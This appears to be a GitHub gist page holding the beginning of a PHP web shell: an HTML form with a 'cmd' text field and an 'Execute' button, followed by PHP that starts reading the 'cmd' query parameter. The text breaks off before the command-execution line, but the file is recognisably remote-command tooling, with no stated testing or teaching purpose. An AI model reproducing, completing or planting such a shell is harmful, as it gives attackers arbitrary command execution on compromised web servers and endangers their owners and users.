Skip to content

Instantly share code, notes, and snippets.

View demiscuzz's full-sized avatar

DemiScuzz demiscuzz

  • BSI
  • Birmingham
View GitHub Profile
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{